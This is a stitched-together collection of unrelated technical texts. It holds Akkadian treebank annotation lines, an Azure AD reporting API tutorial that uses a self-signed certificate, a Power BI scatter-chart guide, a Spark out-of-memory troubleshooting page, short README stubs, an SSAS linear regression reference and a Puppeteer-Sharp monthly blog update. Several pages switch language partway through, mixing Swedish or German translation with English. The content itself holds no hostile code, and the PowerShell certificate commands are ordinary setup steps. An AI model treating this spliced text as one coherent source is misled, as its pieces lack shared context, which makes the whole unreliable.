22 mātāti mātu NOUN N Gender=Fem|NounBase=Free|Number=Plur 20 nmod 20:nmod KUR.KUR.MEŠ
23 anāku anāku PRON IP Number=Sing|Person=1 1 appos 1:appos ana-ku
24 zikaru zikaru NOUN AJ Case=Nom|Gender=Masc|NounBase=Free|Number=Sing 1 appos 1:appos zi-ka-ru
25 qardu qardu ADJ AJ Case=Nom|Gender=Masc|Number=Sing 24 amod 24:amod qar-du
26 mulaʾʾiṭ mulaʾʾiṭu NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos mu-la-iṭ
27 ašṭūte wašṭu NOUN N Gender=Masc|NounBase=Suffixal|Number=Plur 26 nmod:poss 26:nmod:poss aš₂-ṭu-te-šu₂
28 šu _ PRON _ Gender=Masc|Number=Sing|Person=3 27 det:poss 27:det:poss _
29 hitmuṭ hitmuṭu NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos hi-it-muṭ
30 raggi raggu NOUN N Case=Gen|Gender=Masc|NounBase=Free|Number=Sing 29 nmod:poss 29:nmod:poss rag-gi
31 u u CCONJ CNJ _ 32 cc 32:cc u₃
32 ṣēni ṣēnu NOUN N Case=Gen|Gender=Fem|NounBase=Free|Number=Sing 30 conj 30:conj ṣe-ni
33 anāku anāku PRON IP Number=Sing|Person=1 14 cop 14:cop ana-ku
~~~
---
title: Tutorial for the AD reporting API with certificates | Microsoft Docs
description: This tutorial explains how to use the Azure AD reporting API with certificate credentials to get data from directories without user intervention.
services: active-directory
documentationcenter: ''
author: MarkusVi
manager: daveba
ms.assetid: ''
ms.service: active-directory
ms.workload: identity
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: conceptual
ms.subservice: report-monitor
ms.date: 11/13/2018
ms.author: markvi
ms.reviewer: dhanyahk
ms.collection: M365-identity-device-management
ms.custom: has-adal-ref
ms.openlocfilehash: a6699d7a117eee95ba635c8c94ed9b2955f21a7b
ms.sourcegitcommit: a8ee9717531050115916dfe427f84bd531a92341
ms.translationtype: MT
ms.contentlocale: sv-SE
ms.lasthandoff: 05/12/2020
ms.locfileid: "83196884"
---
# <a name="tutorial-get-data-using-the-azure-active-directory-reporting-api-with-certificates"></a>Självstudie: Hämta data med hjälp av Azure Active Directory rapporterings-API med certifikat
[Azure Active Directory reporting API: er](concept-reporting-api.md) ger programmässig åtkomst till data via en uppsättning REST-baserade API: er. Du kan anropa API: erna från en mängd olika programmeringsspråk och verktyg. Om du vill få åtkomst till Azure AD repor ting-API utan åtgärder från användaren måste du konfigurera åtkomsten till att använda certifikat.
I den här självstudien får du lära dig hur du använder ett test certifikat för att komma åt MS-Graph API för rapportering. Vi rekommenderar inte att du använder test certifikat i en produktions miljö.
## <a name="prerequisites"></a>Krav
1. Kontrol lera att du har en Azure Active Directory-klient med en Premium-licens (P1/P2) för att få åtkomst till inloggnings data. Se [Kom igång med Azure Active Directory Premium](../fundamentals/active-directory-get-started-premium.md) för att uppgradera din Azure Active Directory-version. Observera att om du inte har några aktivitetsdata före uppgraderingen tar det ett par dagar innan data visas i rapporterna när du har uppgraderat till en premiumlicens.
2. Skapa eller växla till ett användar konto i rollen **Global administratör**, **säkerhets administratör**, **säkerhets läsare** eller **rapport läsare** för klienten.
3. Slutför [kraven för att få åtkomst till Azure Active Directory rapporterings-API: et](howto-configure-prerequisites-for-reporting-api.md).
4. Hämta och installera [Azure AD PowerShell V2](https://github.com/Azure/azure-docs-powershell-azuread/blob/master/docs-conceptual/azureadps-2.0/install-adv2.md).
5. Installera [MSCloudIdUtils](https://www.powershellgallery.com/packages/MSCloudIdUtils/). Den här modulen tillhandahåller flera verktygs-cmdlets, däribland:
- ADAL-bibliotek som krävs för autentisering
- Åtkomsttoken från användare, programnycklar och certifikat med ADAL
- Växlingsbara resultat för Graph API-hantering
6. Om det är första gången du använder modulen kör **install-MSCloudIdUtilsModule**, annars importerar du den med hjälp av PowerShell **-kommandot Import-Module** . Din session bör se ut ungefär som den här skärmen: 
7. Use the **New-SelfSignedCertificate** PowerShell command to create a test certificate.
   ```powershell
   $cert = New-SelfSignedCertificate -Subject "CN=MSGraph_ReportingAPI" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature -KeyLength 2048 -KeyAlgorithm RSA -HashAlgorithm SHA256
   ```
8. Use the **Export-Certificate** command to export it to a certificate file.
   ```powershell
   Export-Certificate -Cert $cert -FilePath "C:\Reporting\MSGraph_ReportingAPI.cer"
   ```
## <a name="get-data-using-the-azure-active-directory-reporting-api-with-certificates"></a>Get data using the Azure Active Directory reporting API with certificates
1. Navigate to the [Azure portal](https://portal.azure.com), select **Azure Active Directory**, then select **App registrations** and choose your application from the list.
2. Select **Certificates & secrets** under the **Manage** section on the application registration blade, and select **Upload Certificate**.
3. Select the certificate file from the previous step and select **Add**.
4. Note the Application ID and the thumbprint of the certificate you just registered with your application. To find the thumbprint, from your application page in the portal, go to **Certificates & secrets** under the **Manage** section. The thumbprint will be under the **Certificates** list.
5. Open the application manifest in the inline manifest editor and verify the *keyCredentials* property is updated with your new certificate information as shown below -
```
"keyCredentials": [
{
"customKeyIdentifier": "$base64Thumbprint", //base64 encoding of the certificate hash
"keyId": "$keyid", //GUID to identify the key in the manifest
"type": "AsymmetricX509Cert",
"usage": "Verify",
"value": "$base64Value" //base64 encoding of the certificate raw data
}
]
```
6. Now you can get an access token for the MS Graph API using this certificate. Use the **Get-MSCloudIdMSGraphAccessTokenFromCert** cmdlet from the MSCloudIdUtils PowerShell module, passing in the Application ID and the thumbprint you obtained in the previous step.
   
7. Use the access token in your PowerShell script to query the Graph API. Use the **Invoke-MSCloudIdMSGraphQuery** cmdlet from MSCloudIdUtils to enumerate the signins and directoryAudits endpoints. This cmdlet handles multi-paged results, and sends those results to the PowerShell pipeline.
8. Query the directoryAudits endpoint to retrieve the audit logs.
   
9. Query the signins endpoint to retrieve the sign-in logs.
   
10. You can now choose to export this data to a CSV file and save it to a SIEM system. You can also wrap your script in a scheduled task to periodically get Azure AD data from your tenant without having to store application keys in the source code.
## <a name="next-steps"></a>Next steps
* [Get a first impression of the reporting APIs](concept-reporting-api.md)
* [Audit API reference](https://developer.microsoft.com/graph/docs/api-reference/beta/resources/directoryaudit)
* [Sign-in activity report API reference](https://developer.microsoft.com/graph/docs/api-reference/beta/resources/signin)
---
title: Gráficos de dispersão, bolhas e de pontos no Power BI
description: Gráfico de dispersão, gráficos de pontos e gráficos de bolhas no Power BI
author: mihart
ms.reviewer: amac
featuredvideoid: ''
ms.service: powerbi
ms.subservice: powerbi-desktop
ms.topic: how-to
ms.date: 11/21/2019
ms.author: rien
LocalizationGroup: Visualizations
ms.openlocfilehash: b4a5733e0c4b8617dc93edb1e7fe35a0a76a3338
ms.sourcegitcommit: eef4eee24695570ae3186b4d8d99660df16bf54c
ms.translationtype: HT
ms.contentlocale: pt-BR
ms.lasthandoff: 06/23/2020
ms.locfileid: "85238167"
---
# <a name="scatter-charts-bubble-charts-and-dot-plot-charts-in-power-bi"></a>Scatter charts, bubble charts, and dot plot charts in Power BI
[!INCLUDE[consumer-appliesto-nyyn](../includes/consumer-appliesto-nyyn.md)]
[!INCLUDE [power-bi-visuals-desktop-banner](../includes/power-bi-visuals-desktop-banner.md)]
A scatter chart always has two value axes to show one set of numerical data along a horizontal axis and another set of numerical values along a vertical axis. The chart displays points at the intersection of an x and y numerical value, combining these values into single data points. Power BI may distribute these data points evenly or unevenly across the horizontal axis, depending on the data the chart represents.
You can set the number of data points, up to a maximum of 10,000.
## <a name="when-to-use-a-scatter-chart-bubble-chart-or-a-dot-plot-chart"></a>When to use a scatter chart, bubble chart, or a dot plot chart
### <a name="scatter-and-bubble-charts"></a>Scatter and bubble charts
A scatter chart shows the relationship between two numerical values. A bubble chart replaces the data points with bubbles, with the bubble *size* representing an additional, third data dimension.
![Screenshot of an example bubble chart.](media/power-bi-visualization-scatter/power-bi-bubble-chart.png)
Scatter charts are a great choice:
* To show relationships between two numerical values.
* To plot two groups of numbers as one series of x and y coordinates.
* To use instead of a line chart when you want to change the scale of the horizontal axis.
* To turn the horizontal axis into a logarithmic scale.
* To display worksheet data that includes pairs or grouped sets of values.
  > [!TIP]
  > In a scatter chart, you can adjust the independent scales of the axes to reveal more information about the grouped values.
* To show patterns in large sets of data, for example by showing outliers, clusters, and linear or nonlinear trends.
* To compare large numbers of data points without regard to time. The more data you include in a scatter chart, the better the comparisons you can make.
In addition to what scatter charts can do for you, bubble charts are a great choice:
* If your data has three data series that each contain a set of values.
* To present financial data. Different bubble sizes are useful to visually emphasize specific values.
* To use with quadrants.
### <a name="dot-plot-charts"></a>Dot plot charts
A dot plot chart is similar to a bubble chart and a scatter chart, but it is used to plot categorical data along the X axis.
![Screenshot of an example dot plot chart.](media/power-bi-visualization-scatter/power-bi-dot-plot.png)
They're a great choice if you want to include categorical data along the X axis.
## <a name="prerequisites"></a>Prerequisites
This tutorial uses the [Retail Analysis sample PBIX file](https://download.microsoft.com/download/9/6/D/96DDC2FF-2568-491D-AAFA-AFDD6F763AE3/Retail%20Analysis%20Sample%20PBIX.pbix).
1. From the upper left section of the menu bar, select **File** > **Open**.
2. Find your copy of the **Retail Analysis sample PBIX file**.
3. Open the **Retail Analysis sample PBIX file** in report view ![Screenshot of the report view icon.](media/power-bi-visualization-kpi/power-bi-report-view.png).
4. Select ![Screenshot of the yellow tab.](media/power-bi-visualization-kpi/power-bi-yellow-tab.png) to add a new page.
> [!NOTE]
> Sharing your report with a Power BI colleague requires that you both have individual Power BI Pro licenses, or that the report is saved in Premium capacity.
## <a name="create-a-scatter-chart"></a>Create a scatter chart
1. Start on a blank report page and from the **Fields** pane, select these fields:
   * **Sales** > **Sales Per Sq Ft**
   * **Sales** > **Total Sales Variance %**
   * **District** > **District**
   ![Screenshot of the Fields pane with the selected fields.](media/power-bi-visualization-scatter/power-bi-fields-pane.png)
1. In the **Visualization** pane, select ![Screenshot of the scatter chart icon.](media/power-bi-visualization-scatter/power-bi-scatter-chart-icon.png) to convert the clustered column chart to a scatter chart.
   ![Screenshot of the clustered column chart becoming a scatter chart.](media/power-bi-visualization-scatter/power-bi-convert-chart.png)
1. Drag **District** from **Details** to **Legend**.
   Power BI displays a scatter chart that plots **Total Sales Variance %** along the Y axis and **Sales Per Square Feet** along the X axis. The data point colors represent districts:
   ![Screenshot of the scatter chart.](media/power-bi-visualization-scatter/power-bi-scatter-chart.png)
   Now let's add a third dimension.
## <a name="create-a-bubble-chart"></a>Create a bubble chart
1. From the **Fields** pane, drag **Sales** > **This Year Sales** > **Value** to the **Size** well. The data points expand to volumes proportionate with the sales value.
   ![Screenshot of dragging Value to the Size well.](media/power-bi-visualization-scatter/power-bi-bubble.png)
1. Hover over a bubble. The size of the bubble reflects the value of **This Year Sales**.
   ![Screenshot of hovering over a bubble.](media/power-bi-visualization-scatter/power-bi-this-year.png)
1. To set the number of data points to show in your bubble chart, in the **Format** section of the **Visualizations** pane, expand the **General** card and adjust the **Data Volume**.
   ![Screenshot of the Format section with the General card expanded.](media/power-bi-visualization-scatter/power-bi-data-volume.png)
   You can set the max data volume to any number up to 10,000. To ensure good performance as you get into the higher numbers, test first.
   > [!NOTE]
   > More data points can mean a longer loading time. If you choose to publish reports with limits at the higher end of the scale, make sure to test your reports across the web and mobile devices too. You want to confirm that the chart performance matches your users' expectations.
1. Continue formatting the visualization colors, labels, titles, background, and more. To [improve accessibility](../create-reports/desktop-accessibility-overview.md), consider adding marker shapes to each line. To select the marker shape, expand **Shapes**, select **Marker shape**, and select a shape.
   ![Screenshot of the Marker shape menu.](media/power-bi-visualization-scatter/power-bi-marker-shapes.png)
   Change the marker shape to a diamond, triangle, or square. Using a different marker shape for each line makes it easier for report consumers to differentiate lines (or areas) from each other.
1. Open the Analytics pane ![Screenshot of the Analytics pane icon.](media/power-bi-visualization-scatter/power-bi-analytics-pane.png) to add more information to your visualization.
   - Add a median line. Select **Median line** > **Add**. By default, Power BI adds a median line for *Sales per sq ft*. This isn't very helpful, since we can see there are 10 data points and know that the median will be created with five data points on each side. Instead, switch the **Measure** to *Total sales variance %*.
     ![Screenshot of the median line options.](media/power-bi-visualization-scatter/power-bi-median-line.png)
   - Add symmetry shading to show which points have a higher value of the x-axis measure compared to the y-axis measure, and vice versa. When you turn on symmetry shading in the Analytics pane, Power BI shades the background of your scatter chart symmetrically based on the current axis upper and lower boundaries. This is a really quick way to identify which axis measure a data point favors, especially when you have a different axis range for your x and y axes.
     a. Change the **Total sales variance %** field to **Gross margin % last year**.
     ![Screenshot of changing the y-axis field.](media/power-bi-visualization-scatter/power-bi-gross-margin.png)
     b. In the Analytics pane, add **Symmetry shading**. We can see from the shading that Hosiery (the green bubble in the pink shaded area) is the only category that favors gross margin over sales per square feet.
     ![Screenshot of symmetry shading.](media/power-bi-visualization-scatter/power-bi-symmetry-shading.png)
   - Continue exploring the Analytics pane to discover interesting insights in your data.
     ![Screenshot of the Analytics pane.](media/power-bi-visualization-scatter/power-bi-analytics.png)
## <a name="create-a-dot-plot-chart"></a>Create a dot plot chart
To create a dot plot chart, replace the numerical **X Axis** field with a categorical field.
From the **X Axis** well, remove **Sales per sq ft** and replace it with **District** > **District Manager**.
![Screenshot of the new dot plot chart.](media/power-bi-visualization-scatter/power-bi-dot-plot-chart.png)
## <a name="considerations-and-troubleshooting"></a>Considerations and troubleshooting
### <a name="your-scatter-chart-has-only-one-data-point"></a>Your scatter chart has only one data point
Does your scatter chart have only one data point that aggregates all the values on the X and Y axes? Or maybe it aggregates all the values along a single horizontal or vertical line?
![Screenshot of a scatter chart with one data point.](media/power-bi-visualization-scatter/power-bi-scatter-point.png)
Add a field to the **Details** well to tell Power BI how to group the values. The field must be unique for each point you want to plot. A simple row number or ID field will do.
![Screenshot of a scatter chart with a Details field added.](media/power-bi-visualization-scatter/power-bi-scatter-points.png)
If you don't have such a field in your data, create one that concatenates your X and Y values into something unique per point:
![Screenshot of a concatenated field.](media/power-bi-visualization-scatter/power-bi-concatenate.png)
To create a new field, [use the Power BI Desktop Query Editor to add an Index Column](../create-reports/desktop-add-custom-column.md) to your dataset. Then add this column to your visual's **Details** well.
## <a name="next-steps"></a>Next steps
You might also be interested in the following articles:
* [High-density sampling in Power BI scatter charts](../create-reports/desktop-high-density-scatter-charts.md)
* [Visualization types in Power BI](power-bi-visualization-types-for-reports-and-q-and-a.md)
* [Tips for sorting and distributing data plots in Power BI reports](../guidance/report-tips-sort-distribute-data-plots.md)
More questions? [Try the Power BI Community](https://community.powerbi.com/)
---
title: OutOfMemoryError exception for Apache Spark in Azure HDInsight
description: OutOfMemoryError exception for Apache Spark in Azure HDInsight
ms.service: hdinsight
ms.topic: troubleshooting
author: hrasheed-msft
ms.author: hrasheed
ms.date: 07/26/2019
---
# Scenario: OutOfMemoryError exception for Apache Spark in Azure HDInsight
This article describes troubleshooting steps and possible resolutions for issues when using Apache Spark components in Azure HDInsight clusters.
## Issue
Your Apache Spark application failed with an unhandled OutOfMemoryError exception. You may receive an error message similar to:
```error
ERROR Executor: Exception in task 7.0 in stage 6.0 (TID 439)
java.lang.OutOfMemoryError
at java.io.ByteArrayOutputStream.hugeCapacity(Unknown Source)
at java.io.ByteArrayOutputStream.grow(Unknown Source)
at java.io.ByteArrayOutputStream.ensureCapacity(Unknown Source)
at java.io.ByteArrayOutputStream.write(Unknown Source)
at java.io.ObjectOutputStream$BlockDataOutputStream.drain(Unknown Source)
at java.io.ObjectOutputStream$BlockDataOutputStream.setBlockDataMode(Unknown Source)
at java.io.ObjectOutputStream.writeObject0(Unknown Source)
at java.io.ObjectOutputStream.writeObject(Unknown Source)
at org.apache.spark.serializer.JavaSerializationStream.writeObject(JavaSerializer.scala:44)
at org.apache.spark.serializer.JavaSerializerInstance.serialize(JavaSerializer.scala:101)
at org.apache.spark.executor.Executor$TaskRunner.run(Executor.scala:239)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
```
```error
ERROR SparkUncaughtExceptionHandler: Uncaught exception in thread Thread[Executor task launch worker-0,5,main]
java.lang.OutOfMemoryError
at java.io.ByteArrayOutputStream.hugeCapacity(Unknown Source)
...
```
## Cause
The most likely cause of this exception is insufficient heap memory. Your Spark application requires enough Java virtual machine (JVM) heap memory when running as executors or drivers.
## Resolution
1. Determine the maximum size of the data the Spark application will handle. Estimate the size based on the maximum of: the size of the input data, the intermediate data produced by transforming the input data, and the output data produced by further transforming the intermediate data. If the initial estimate isn't sufficient, increase the size slightly and iterate until the memory errors subside.
1. Make sure that the HDInsight cluster to be used has enough resources in terms of memory and also cores to accommodate the Spark application. This can be determined by viewing the Cluster Metrics section of the YARN UI of the cluster for the values of Memory Used vs. Memory Total and VCores Used vs. VCores Total.

1. Set the following Spark configurations to appropriate values. Balance the application requirements with the available resources in the cluster. These values should not exceed 90% of the available memory and cores as viewed by YARN, and should also meet the minimum memory requirement of the Spark application:
```
spark.executor.instances (Example: 8 for 8 executor count)
spark.executor.memory (Example: 4g for 4 GB)
spark.yarn.executor.memoryOverhead (Example: 384m for 384 MB)
spark.executor.cores (Example: 2 for 2 cores per executor)
spark.driver.memory (Example: 8g for 8GB)
spark.driver.cores (Example: 4 for 4 cores)
spark.yarn.driver.memoryOverhead (Example: 384m for 384MB)
```
Total memory used by all executors =
```
spark.executor.instances * (spark.executor.memory + spark.yarn.executor.memoryOverhead)
```
Total memory used by driver =
```
spark.driver.memory + spark.yarn.driver.memoryOverhead
```
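Plugging in the example values listed above, the two totals can be sanity-checked with a few lines of arithmetic. This sketch uses the illustrative settings from this article (8 executors at 4 GB + 384 MB each, and a driver at 8 GB + 384 MB); it is not a recommendation for a real cluster:

```python
# Memory budget check for the example Spark settings in this article.
# All figures are in megabytes and come from the illustrative
# configuration above.

executor_instances   = 8           # spark.executor.instances
executor_memory_mb   = 4 * 1024    # spark.executor.memory = 4g
executor_overhead_mb = 384         # spark.yarn.executor.memoryOverhead = 384m
driver_memory_mb     = 8 * 1024    # spark.driver.memory = 8g
driver_overhead_mb   = 384         # spark.yarn.driver.memoryOverhead = 384m

# Total memory used by all executors
executors_total_mb = executor_instances * (executor_memory_mb + executor_overhead_mb)

# Total memory used by the driver
driver_total_mb = driver_memory_mb + driver_overhead_mb

print(executors_total_mb)  # 35840 MB (35 GB)
print(driver_total_mb)     # 8576 MB (about 8.4 GB)
```

Keeping this combined total under roughly 90% of the memory YARN reports for the cluster is the check described in the previous step.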
## Next steps
If you didn't see your problem or are unable to solve your issue, visit one of the following channels for more support:
* [Spark memory management overview](https://spark.apache.org/docs/latest/tuning.html#memory-management-overview).
* [Debugging Spark application on HDInsight clusters](https://blogs.msdn.microsoft.com/azuredatalake/2016/12/19/spark-debugging-101/).
* Get answers from Azure experts through [Azure Community Support](https://azure.microsoft.com/support/community/).
* Connect with [@AzureSupport](https://twitter.com/azuresupport) - the official Microsoft Azure account for improving customer experience by connecting the Azure community to the right resources: answers, support, and experts.
* If you need more help, you can submit a support request from the [Azure portal](https://portal.azure.com/?#blade/Microsoft_Azure_Support/HelpAndSupportBlade/). Select **Support** from the menu bar or open the **Help + support** hub. For more detailed information, please review [How to create an Azure support request](https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request). Access to Subscription Management and billing support is included with your Microsoft Azure subscription, and Technical Support is provided through one of the [Azure Support Plans](https://azure.microsoft.com/support/plans/).
# KPT Functions SDK
Documentation:
https://googlecontainertools.github.io/kpt-functions-sdk/
# Grade 12 Processing // Excluding Final Project, BomberDX
This is all of the work I did in ICS-4U1 at Bayside Secondary School using Processing.
---
title: Mingingmodellinhalt von linearen Regressionsmodellen (Analysis Services – Datamining) | Microsoft-Dokumentation
ms.custom: ''
ms.date: 06/13/2017
ms.prod: sql-server-2014
ms.reviewer: ''
ms.technology: analysis-services
ms.topic: conceptual
helpviewer_keywords:
- linear regression algorithms [Analysis Services]
- mining model content, linear regression models
- regression algorithms [Analysis Services]
ms.assetid: a6abcb75-524e-4e0a-a375-c10475ac0a9d
author: minewiskan
ms.author: owend
manager: craigg
ms.openlocfilehash: 933b56aaa6e364ce55cac8832fc577acc061d510
ms.sourcegitcommit: 3026c22b7fba19059a769ea5f367c4f51efaf286
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 06/15/2019
ms.locfileid: "66083640"
---
# <a name="mining-model-content-for-linear-regression-models-analysis-services---data-mining"></a>Mining model content for linear regression models (Analysis Services - Data Mining)
  This topic describes mining model content that is specific to models that use the [!INCLUDE[msCoName](../../includes/msconame-md.md)] Linear Regression algorithm. For an explanation of general mining model content that applies to all model types, see [Mining Model Content (Analysis Services - Data Mining)](mining-model-content-analysis-services-data-mining.md).
## <a name="understanding-the-structure-of-a-linear-regression-model"></a>Understanding the structure of a linear regression model
  A linear regression model has an extremely simple structure. Each model has a single parent node that represents the model and its metadata, and a regression tree node (NODE_TYPE = 25) that contains the regression formula for each predictable attribute.
  ![Structure of a model for linear regression](../media/modelcontent-structure-linreg.gif "Structure of a model for linear regression")
  Linear regression models use the same algorithm as [!INCLUDE[msCoName](../../includes/msconame-md.md)] Decision Trees; however, different parameters are used to constrain the tree, and only continuous attributes are accepted as inputs. Because linear regression models are based on the [!INCLUDE[msCoName](../../includes/msconame-md.md)] Decision Trees algorithm, they are displayed by using the [!INCLUDE[msCoName](../../includes/msconame-md.md)] Decision Tree Viewer. For information, see [Browse a Model Using the Microsoft Tree Viewer](browse-a-model-using-the-microsoft-tree-viewer.md).
  The next section explains how to interpret the information in the regression formula node. This information applies not only to linear regression models, but also to decision tree models that contain regressions in a portion of the tree.
## <a name="model-content-for-a-linear-regression-model"></a>Model content for a linear regression model
  This section provides details and examples only for those columns of the mining model content that are relevant for linear regression.
  For information about general-purpose columns in the schema rowset, see [Mining Model Content (Analysis Services - Data Mining)](mining-model-content-analysis-services-data-mining.md).
MODEL_CATALOG
Name of the database where the model is stored.
MODEL_NAME
Name of the model.
ATTRIBUTE_NAME
**Root node:** Blank
**Regression node:** The name of the predictable attribute.
NODE_NAME
Always same as NODE_UNIQUE_NAME.
NODE_UNIQUE_NAME
A unique identifier for the node within the model. This value cannot be changed.
NODE_TYPE
A linear regression model outputs the following node types:
|Node type ID|Type|Description|
|------------------|----------|-----------------|
|25|Regression tree root|Contains the formula that describes the relationship between the input and output variable.|
NODE_CAPTION
A label or caption associated with the node. This property is primarily for display purposes.
**Root node:** Blank
**Regression node:** All.
CHILDREN_CARDINALITY
An estimate of the number of children that the node has.
**Root node:** Indicates the number of regression nodes. One regression node is created for each predictable attribute in the model.
**Regression node:** Always 0.
PARENT_UNIQUE_NAME
The unique name of the node's parent. NULL is returned for any nodes at the root level.
NODE_DESCRIPTION
A description of the node.
**Root node:** Blank
**Regression node:** All.
NODE_RULE
Not used for linear regression models.
MARGINAL_RULE
Not used for linear regression models.
NODE_PROBABILITY
The probability associated with this node.
**Root node:** 0
**Regression node:** 1
MARGINAL_PROBABILITY
The probability of reaching the node from the parent node.
**Root node:** 0
**Regression node:** 1
NODE_DISTRIBUTION
A nested table that provides statistics about the values in the node.
**Root node:** 0
**Regression node:** A table that contains the elements used to build the regression formula. A regression node contains the following value types:
|VALUETYPE|
|---------------|
|1 (Missing)|
|3 (Continuous)|
|7 (Coefficient)|
|8 (Score Gain)|
|9 (Statistics)|
|11 (Intercept)|
NODE_SUPPORT
The number of cases that support this node.
**Root node:** 0
**Regression node:** Count of training cases.
MSOLAP_MODEL_COLUMN
Name of the predictable attribute.
MSOLAP_NODE_SCORE
Same as NODE_PROBABILITY.
MSOLAP_NODE_SHORT_CAPTION
A label used for display purposes.
## <a name="remarks"></a>Remarks
When you create a model by using the [!INCLUDE[msCoName](../../includes/msconame-md.md)] Linear Regression algorithm, the data mining engine creates a special instance of a decision trees model and supplies parameters that constrain the tree to contain all the training data in a single node. All continuous inputs are flagged and evaluated as potential regressors, but only those regressors that fit the data are retained as regressors in the final model. The analysis produces either a single regression formula for each regressor, or no regression formula at all.
You can view the complete regression formula in the **Mining Legend** by clicking the **(All)** node in the [Microsoft Tree Viewer](browse-a-model-using-the-microsoft-tree-viewer.md).
Also, when you create a decision trees model that contains a continuous predictable attribute, the tree sometimes has regression nodes that share the properties of regression tree nodes.
## <a name="NodeDist_Regression"></a> Node distribution for continuous attributes
Most of the important information in a regression node is contained in the NODE_DISTRIBUTION table. The following example illustrates the layout of the NODE_DISTRIBUTION table. In this example, the Targeted Mailing mining structure has been used to create a linear regression model that predicts customer income based on age. The model is for illustration only, because it can be built easily by using the existing [!INCLUDE[ssSampleDBnormal](../../includes/sssampledbnormal-md.md)] sample data and mining structure.
|ATTRIBUTE_NAME|ATTRIBUTE_VALUE|SUPPORT|PROBABILITY|VARIANCE|VALUETYPE|
|---------------------|----------------------|-------------|-----------------|--------------|---------------|
|Yearly Income|Missing|0|0.000457142857142857|0|1|
|Yearly Income|57220.8876687257|17484|0.999542857142857|1041275619.52776|3|
|Age|471.687717702463|0|0|126.969442359327|7|
|Age|234.680904692439|0|0|0|8|
|Age|45.4269617936399|0|0|126.969442359327|9|
||35793.5477381267|0|0|1012968919.28372|11|
The NODE_DISTRIBUTION table contains multiple rows, each grouped by a variable. The first two rows are always value types 1 and 3, and describe the target attribute. The subsequent rows provide details about the formula for a particular *regressor*. A regressor is an input variable that has a linear relationship with the output variable. You can have multiple regressors, and each regressor has a separate row for the coefficient (VALUETYPE = 7), score gain (VALUETYPE = 8), and statistics (VALUETYPE = 9). Finally, the table has a row that contains the intercept of the equation (VALUETYPE = 11).
### <a name="elements-of-the-regression-formula"></a>Elements of the regression formula
The nested NODE_DISTRIBUTION table contains each element of the regression formula in a separate row. The first two rows of data in the example results contain information about the predictable attribute **Yearly Income**, which models the dependent variable. The SUPPORT column shows the count of cases in support of the two states of this attribute: either a **Yearly Income** value was available, or the **Yearly Income** value was missing.
The VARIANCE column tells you the computed variance of the predictable attribute. *Variance* is a measure of how scattered the values in a sample are, given an expected distribution. Variance is calculated here by taking the average of the squared deviation from the mean. The square root of the variance is also known as the standard deviation. [!INCLUDE[ssASnoversion](../../includes/ssasnoversion-md.md)] does not provide the standard deviation, but you can easily calculate it.
Schließlich enthält die Tabelle eine Zeile, die das konstante Glied der Gleichung bereitstellt.
#### <a name="coefficient"></a>Koeffizient
Für jeden Regressor wird ein Koeffizient (VALUETYPE = 7) berechnet. Der Koeffizient selbst erscheint in der Spalte ATTRIBUTE_VALUE, während die Spalte VARIANCE die Varianz für den Koeffizienten angibt. Die Koeffizienten werden berechnet, um Linearität zu maximieren.
#### <a name="score-gain"></a>Ergebnisgewinn
Der Ergebnisgewinn (VALUETYPE = 8) für jeden Regressor stellt den Interessantheitsgrad des Attributs dar. Sie können diesen Wert verwenden, um die Nützlichkeit von mehreren Regressoren einzuschätzen.
#### <a name="statistics"></a>Statistik
Die Regressorstatistik (VALUETYPE = 9) ist der Mittelwert für das Attribut für Fälle, die über einen Wert verfügen. Die Spalte ATTRIBUTE_VALUE enthält den Mittelwert selbst, während die Spalte VARIANCE die Summe der Abweichungen vom Mittelwert enthält.
#### <a name="intercept"></a>Konstantes Glied
In der Regel gibt das *konstante Glied* (VALUETYPE = 11) oder das *Residuum* in einer Regressionsgleichung den Wert des vorhersagbaren Attributs an dem Punkt an, an dem das Eingabeattribut 0 ist. In vielen Fällen geschieht dies nicht und könnte zu nicht intuitiven Ergebnissen führen.
Beispielsweise ist es bei einem Modell, das das Einkommen basierend auf dem Alter vorhersagt, nicht nützlich, das Einkommen bei einem Alter von 0 Jahren anzugeben. In realen Situationen ist es in der Regel nützlicher, das Verhalten in Bezug auf einen Durchschnittswert zu erfahren. Daher ändert [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] [!INCLUDE[ssASnoversion](../../includes/ssasnoversion-md.md)] das kontante Glied so, dass jeder Regressor in Beziehung zum Mittelwert ausgedrückt wird.
Diese Anpassung ist im Miningmodellinhalt schwer ersichtlich. Sie wird erst deutlich, wenn man die vollständige Gleichung in der **Mininglegende** des **Microsoft Struktur-Viewer**einsieht. Die Regressionsformel wird weg vom Punkt 0 zu dem Punkt verlagert, der den Mittelwert darstellt. Dies stellt eine Sicht dar, die angesichts der aktuellen Daten intuitiver ist.
Daher gibt das konstante Glied (VALUETYPE = 11) für die Regressionsformel bei einem Durchschnittsalter von 45 ein durchschnittliches Einkommen an.
## <a name="see-also"></a>Siehe auch
[Miningmodellinhalt (Analysis Services – Data Mining)](mining-model-content-analysis-services-data-mining.md)
[Microsoft Linear Regression-Algorithmus](microsoft-linear-regression-algorithm.md)
[Technische Referenz für den Microsoft Linear Regression-Algorithmus](microsoft-linear-regression-algorithm-technical-reference.md)
[Beispiele für lineare Regressionsmodellabfrage](linear-regression-model-query-examples.md)
---
title: Puppeteer Sharp Monthly Report - January 2019
tags: puppeteer-sharp csharp
permalink: /blog/puppeteer-sharp-monthly-jan-2019
---
Happy new year Puppeteerers! (Is that even a word?)
We launched [v1.11](https://github.com/hardkoded/puppeteer-sharp/releases/tag/v1.11) during December. The most important feature on v1.11 was _drum rolls_ LINUX SUPPORT!

I want to thank [Dominic Böttger](https://twitter.com/dboettger) who setup our Linux CI and made some tweaks to make Puppeteer-Sharp work in Linux.
We also worked a lot on stability. Our CI builds were failing many times before getting green, so we evaluated every failure and made some improvements. Our builds are working way better than before. That also means that Puppeteer-Sharp is more stable and reliable.
# What's next
I bet Puppeteer v1.12 is around the corner so we will be working on that.
We have more housekeeping to do. I would love to start testing Puppeteer-Sharp on the cloud (e.g. Azure Functions) and also build some Docker images.
# Activity
* Repository Stars: 383 (prev. 340) +12%
* Repository Forks: 67 (prev. 61) +9%
